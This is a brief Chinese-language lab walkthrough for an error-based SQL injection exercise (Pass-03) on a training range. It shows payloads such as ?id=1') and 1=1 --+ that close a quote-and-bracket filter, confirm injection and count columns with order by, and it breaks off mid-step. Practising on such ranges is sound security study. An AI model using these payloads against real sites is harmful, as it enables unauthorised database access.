靶场
掌控安全靶场地址:http://inject2.lab.aqlab.cn:81/Pass-03/index.php?id=1
显错注入(三)
没注入之前
我们可以看到这个过滤,不仅加了单引号之外,还加了小括号。
但是没事,我们像前面一样,把单引号闭合,小括号同理,也闭合。
1.判断是否存在SQL注入点
构建SQL语句:
?id=1’) and 1=1 --+ 页面正常
?id=1’) and 1=2 --+ 查看页面是否正常。结果页面显示不正常。存在SQL注入点。第一个')
要跟前面的闭合 --+ 注释掉后面的')
2.判断字段数
构建SQL语句:
?id=1’) order by 3 --+ 页面正常
?id=1’) order by 4 --+ 页面报错,可以判断网页